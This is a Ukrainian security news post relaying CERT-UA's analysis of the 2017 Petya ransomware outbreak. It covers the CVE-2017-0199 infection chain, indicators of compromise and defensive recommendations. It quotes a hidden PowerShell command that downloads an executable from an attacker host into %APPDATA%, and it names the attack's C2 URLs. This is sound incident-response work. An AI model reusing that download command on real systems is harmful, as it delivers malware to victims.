Наші новини


Дізнайтеся першими про результати нашої роботи та останні новини
в сфері інформаційної безпеки

bg_header2.jpg

В першій половині дня розпочалася масова атака на український та комерційний сектор із застосування шкідливого програмного забезпечення, що позиціонується як Petya Ransomware.

Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл:
[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/

Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).
Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/

Даний xls-файл виступав в якості завантажувача та містив в собі обфускований javascript код.

Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)
Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.
Командно-контрольний центр:

  • hххp://coffeinoffice.xyz:80/cup/wish.php
Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі. Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп. Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.

За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.

Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).

Перелік індикаторів компрометації:

  • 84.200.16.242:80
  • french-cooking.com:443
  • coffeinoffice.xyz:80
  • File Name Order-20062017.doc (RTF із CVE-2017-0199)
  • MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
  • SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
  • SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
  • File Name myguy.xls
  • MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
  • SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
  • SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

Рекомендації CERT-UA:

  1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.
  3. Установити офіційний патч MS17-010.
  4. На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.
  5. В разі інфікування персонального комп’ютера не перезавантажувати систему.
  6. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  7. Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
  8. Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.

Повідомити про інцидент